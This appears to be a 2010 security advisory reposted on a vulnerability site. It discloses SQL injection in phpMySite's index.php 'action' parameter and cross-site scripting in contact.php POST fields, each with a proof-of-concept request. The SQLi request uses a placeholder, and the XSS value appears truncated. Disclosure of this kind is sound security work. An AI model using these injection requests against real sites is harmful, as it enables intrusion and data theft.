================================================================= [~] phpMySite (XSS/SQLi) Multiple Remote Vulnerabilities ================================================================= ########################################################## ## Author: Crux ## Homepage: http://hack-tech.com ## Date: 2-27-2010 ## Software Link: http://www.phpmysite.com/ ## Version: N/A ########################################################## [ SQLi ] --------------------------------- // This vulnerability affects index.php // Can be exploited VIA the GET variable 'action' [#] Exploit / POC index.php?action=${SQLINJECTIONHERE}&key=111-222-1933email@address.tst [ XSS ] --------------------------------- // This vulnerability affects contact.php // Can be exploited via the following POST variables: // name, city, email, state, message [#] Exploit / POC name=Crux&city=1>">&state=NY&email=sample%40email%2Etst&message=111-222-1933email@address.tst&word=111-222-1933email@address.tst =================================================================
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论